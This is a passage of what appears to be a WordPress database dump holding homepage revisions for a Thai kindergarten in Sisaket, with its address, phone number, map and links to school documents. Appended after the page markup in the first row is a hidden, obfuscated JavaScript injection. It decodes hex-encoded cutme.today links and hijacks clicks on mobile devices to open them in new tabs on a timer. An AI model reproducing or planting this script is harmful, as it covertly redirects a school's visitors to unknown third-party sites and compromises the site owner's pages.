{\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 09:52:01','2024-08-29 02:52:01','',19,'http://watprato.ssk.in.th/?p=252',0,'revision','',0),
(253,2,'2024-08-29 09:55:51','2024-08-29 02:55:51','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":3,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem 